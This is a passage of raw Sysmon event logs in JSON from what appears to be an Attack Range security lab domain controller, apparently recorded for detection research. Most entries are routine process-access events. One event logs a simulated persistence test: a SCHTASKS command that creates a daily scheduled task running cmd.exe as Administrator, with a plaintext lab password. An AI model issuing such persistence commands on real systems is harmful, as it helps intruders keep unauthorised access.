06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.289\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nProcessId: 4164\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: SCHTASKS  /Create /S localhost /RU ATTACKRANGE\\Administrator /RP I-l1ke-Attack-Range! /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST 20:10 \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nParentProcessId: 4496\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU ATTACKRANGE\\Administrator /RP I-l1ke-Attack-Range! /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST 20:10\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.289","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"SCHTASKS  /Create /S localhost /RU ATTACKRANGE\\Administrator /RP I-l1ke-Attack-Range! /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST 20:10 ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","ParentProcessId":"4496","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU ATTACKRANGE\\Administrator /RP I-l1ke-Attack-Range! /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST 20:10\" ","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nSourceProcessId: 4496\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","SourceProcessId":"4496","SourceThreadId":"4808","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 